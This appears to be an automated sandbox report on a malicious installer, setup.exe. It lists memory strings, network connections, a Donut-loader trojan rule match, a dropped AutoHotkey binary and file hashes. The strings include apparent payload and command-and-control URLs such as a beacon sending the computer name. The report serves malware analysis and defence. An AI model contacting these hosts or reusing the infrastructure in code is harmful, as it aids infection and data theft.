          Source: setup.exe, 00000000.00000003.1854856966.0000000003699000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
          Source: setup.exe, 00000000.00000003.1854856966.0000000003699000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
          Source: setup.exe, 00000000.00000003.1829151323.00000000036AA000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1829405656.00000000036A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: powershell.exe, 00000004.00000002.2025410025.0000000007AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka..winsvr
          Source: powershell.exe, 00000004.00000002.2014602281.0000000005351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
          Source: powershell.exe, 00000004.00000002.2014602281.0000000005584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
          Source: setup.exe, 00000000.00000003.1829151323.00000000036AA000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1829405656.00000000036A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: setup.exe, 00000000.00000003.2073247216.000000000090D000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2005938451.0000000000909000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txt
          Source: setup.exe, 00000000.00000003.2073247216.000000000090D000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2005938451.0000000000909000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txt3h
          Source: setup.exe, 00000000.00000003.2073247216.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drString found in binary or memory: https://certs.securetrust.com/CA0
          Source: setup.exe, 00000000.00000003.2073247216.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drString found in binary or memory: https://certs.securetrust.com/CA05
          Source: setup.exe, 00000000.00000002.2078744236.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drString found in binary or memory: https://certs.securetrust.com/CA0:
          Source: setup.exe, 00000000.00000003.1829151323.00000000036AA000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1829405656.00000000036A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: setup.exe, 00000000.00000003.1829151323.00000000036AA000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1829405656.00000000036A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: powershell.exe, 00000004.00000002.2022246655.00000000063B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000004.00000002.2022246655.00000000063B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000004.00000002.2022246655.00000000063B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000004.00000002.2014602281.00000000054A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online
          Source: powershell.exe, 00000004.00000002.2014602281.0000000005584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=
          Source: powershell.exe, 00000004.00000002.2014602281.00000000054A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=user-PC
          Source: setup.exe, 00000000.00000003.1829151323.00000000036AA000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1829405656.00000000036A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: setup.exe, 00000000.00000003.1829151323.00000000036AA000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1829405656.00000000036A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: setup.exe, 00000000.00000003.1829151323.00000000036AA000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1829405656.00000000036A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: powershell.exe, 00000004.00000002.2014602281.00000000054A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000004.00000002.2014602281.0000000005B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2097784921.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.drString found in binary or memory: https://jrsoftware.org/
          Source: setup.exe, 00000000.00000003.2009593627.0000000003BB2000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2009507319.0000000003C61000.00000004.00000800.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe, 00000006.00000000.2071669913.0000000000F51000.00000020.00000001.01000000.00000008.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2097784921.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.drString found in binary or memory: https://jrsoftware.org0
          Source: setup.exe, 00000000.00000002.2088273574.000000000096D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/
          Source: setup.exe, 00000000.00000003.2073247216.0000000000917000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2085467955.0000000000917000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2005938451.0000000000916000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2088273574.000000000096D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txt
          Source: setup.exe, 00000000.00000003.2005263169.0000000000957000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2087997454.0000000000957000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txt~
          Source: setup.exe, 00000000.00000002.2088273574.000000000096D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop:443/int_clp_sha.txt
          Source: setup.exe, 00000000.00000003.1828202359.0000000000917000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900197149.000000000096A000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2078744236.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1885564075.000000000095E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1948459100.000000000096D000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2088273574.000000000096D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://learningypr.click/
          Source: setup.exe, 00000000.00000003.1828202359.0000000000917000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://learningypr.click/Q
          Source: setup.exe, 00000000.00000003.1885564075.000000000095E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://learningypr.click/apb
          Source: setup.exe, 00000000.00000003.1970399938.0000000000988000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2005263169.0000000000957000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1885564075.0000000000987000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1841688890.0000000003666000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1828202359.0000000000917000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1947858906.0000000000957000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2087997454.0000000000957000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1930354486.0000000000957000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2078744236.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1853872165.0000000003670000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1948459100.0000000000988000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1842691314.000000000366D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://learningypr.click/api
          Source: setup.exe, 00000000.00000003.1841688890.0000000003666000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://learningypr.click/apiF
          Source: setup.exe, 00000000.00000002.2078744236.00000000008B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://learningypr.click/apiS
          Source: setup.exe, 00000000.00000002.2078744236.00000000008B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://learningypr.click/apic
          Source: setup.exe, 00000000.00000003.1828202359.000000000094A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://learningypr.click/apies=0F
          Source: setup.exe, 00000000.00000003.1828202359.0000000000917000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://learningypr.click/apij
          Source: setup.exe, 00000000.00000002.2078744236.00000000008B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://learningypr.click/pi
          Source: setup.exe, 00000000.00000003.1885564075.000000000095E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://learningypr.click/pp
          Source: setup.exe, 00000000.00000003.1828202359.0000000000904000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1948459100.000000000096D000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2088273574.000000000096D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://learningypr.click:443/api
          Source: powershell.exe, 00000004.00000002.2022246655.00000000063B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2097784921.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.drString found in binary or memory: https://sectigo.com/CPS0D
          Source: setup.exe, 00000000.00000002.2078744236.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drString found in binary or memory: https://ssl.trustwave.com/CA03
          Source: setup.exe, 00000000.00000003.1829977664.0000000003704000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
          Source: setup.exe, 00000000.00000003.1856973262.000000000378C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
          Source: setup.exe, 00000000.00000003.1856973262.000000000378C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
          Source: setup.exe, 00000000.00000003.1830105452.00000000036B6000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1841442094.00000000036B6000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1829977664.0000000003702000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1841764761.00000000036B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
          Source: setup.exe, 00000000.00000003.1830105452.0000000003691000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
          Source: setup.exe, 00000000.00000003.1830105452.00000000036B6000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1841442094.00000000036B6000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1829977664.0000000003702000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1841764761.00000000036B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
          Source: setup.exe, 00000000.00000003.1830105452.0000000003691000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2097784921.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.drString found in binary or memory: https://www.certum.pl/CPS0
          Source: setup.exe, 00000000.00000003.1829151323.00000000036AA000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1829405656.00000000036A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: setup.exe, 00000000.00000003.1829151323.00000000036AA000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1829405656.00000000036A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.exe, 00000006.00000003.2075890487.000000000336F000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe, 00000006.00000003.2085146266.000000007F31B000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000000.2092228828.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000000.2112064936.0000000000E7D000.00000020.00000001.01000000.0000000C.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp.8.drString found in binary or memory: https://www.innosetup.com/
          Source: setup.exe, 00000000.00000003.1856973262.000000000378C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
          Source: setup.exe, 00000000.00000003.1856973262.000000000378C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
          Source: setup.exe, 00000000.00000003.1856973262.000000000378C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
          Source: setup.exe, 00000000.00000003.1856973262.000000000378C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
          Source: setup.exe, 00000000.00000003.1856973262.000000000378C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.exe, 00000006.00000003.2075890487.000000000336F000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe, 00000006.00000003.2085146266.000000007F31B000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000000.2092228828.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000000.2112064936.0000000000E7D000.00000020.00000001.01000000.0000000C.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp.8.drString found in binary or memory: https://www.remobjects.com/ps
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49730 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49731 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49733 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49735 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49739 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49741 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49742 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49743 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49744 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49745 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.208.58:443 -> 192.168.2.4:49746 version: TLS 1.2

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
          Sample or dropped binary is a compiled AutoHotkey binary
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeWindow found: window name: AutoHotkey
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00800770 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread,0_2_00800770
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007B03B00_2_007B03B0
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_008007700_2_00800770
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007D804D0_2_007D804D
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007F203D0_2_007F203D
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007F302D0_2_007F302D
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007E102A0_2_007E102A
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007BF0010_2_007BF001
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007B00000_2_007B0000
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007C70E70_2_007C70E7
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007CF0CD0_2_007CF0CD
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007BC0CD0_2_007BC0CD
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007EB09D0_2_007EB09D
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007B716D0_2_007B716D
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007DD1560_2_007DD156
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007B512D0_2_007B512D
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007F327D0_2_007F327D
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007E426D0_2_007E426D
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007BD2620_2_007BD262
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007F123F0_2_007F123F
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007CE2CB0_2_007CE2CB
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007C33090_2_007C3309
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007D43F90_2_007D43F9
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007C94740_2_007C9474
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007F245D0_2_007F245D
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007B640D0_2_007B640D
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007E94CF0_2_007E94CF
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007E04A00_2_007E04A0
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007EA5ED0_2_007EA5ED
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007CF58D0_2_007CF58D
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007D366D0_2_007D366D
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007DC61D0_2_007DC61D
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007C26D00_2_007C26D0
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007E477D0_2_007E477D
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007B472D0_2_007B472D
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007CB70D0_2_007CB70D
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007BA7FD0_2_007BA7FD
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007E67F90_2_007E67F9
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007F087D0_2_007F087D
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007C78630_2_007C7863
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007EF8280_2_007EF828
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007DE8E30_2_007DE8E3
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007ED8BD0_2_007ED8BD
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007F188D0_2_007F188D
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007E99120_2_007E9912
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007DE9FC0_2_007DE9FC
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007DE9E90_2_007DE9E9
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007E89E60_2_007E89E6
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007B79CD0_2_007B79CD
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007CFA6D0_2_007CFA6D
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007BAA6D0_2_007BAA6D
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007D3A4D0_2_007D3A4D
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007B5ADD0_2_007B5ADD
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007C3A8C0_2_007C3A8C
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007C0B690_2_007C0B69
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007D5B5D0_2_007D5B5D
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007CCB130_2_007CCB13
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007BDBE10_2_007BDBE1
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007D0BCD0_2_007D0BCD
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007B8C3D0_2_007B8C3D
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007F1C2D0_2_007F1C2D
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007E9C2D0_2_007E9C2D
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007BFCC50_2_007BFCC5
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007D6CA60_2_007D6CA6
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007D9C960_2_007D9C96
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007EDD6D0_2_007EDD6D
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007CADCD0_2_007CADCD
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007C3D8D0_2_007C3D8D
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007DBE5D0_2_007DBE5D
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007B7E5D0_2_007B7E5D
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007DCE560_2_007DCE56
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007BAE4D0_2_007BAE4D
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007E2E0D0_2_007E2E0D
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007DEEC70_2_007DEEC7
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007B9EAD0_2_007B9EAD
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007E9E8D0_2_007E9E8D
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007C8FEF0_2_007C8FEF
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007DDFDD0_2_007DDFDD
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe 16E037D7B5F6A8E02B73671E1214B7979EB5D0AB0FC1106CF4C321F0FF53E13A
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp 8D6E5513DE230109BE2238537173352832D1AEBDC7B10FAD0E59D4882812CA81
          Source: C:\Users\user\Desktop\setup.exeCode function: String function: 007B987D appears 70 times
          Source: C:\Users\user\Desktop\setup.exeCode function: String function: 007C625D appears 61 times
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp.6.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp.8.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp.6.drStatic PE information: Number of sections : 11 > 10
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp.8.drStatic PE information: Number of sections : 11 > 10
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drStatic PE information: Number of sections : 11 > 10
          Source: setup.exe, 00000000.00000003.1806627844.00000000029C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WM/OriginalFilename vs setup.exe
          Source: setup.exe, 00000000.00000000.1654419855.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: WM/OriginalFilename vs setup.exe
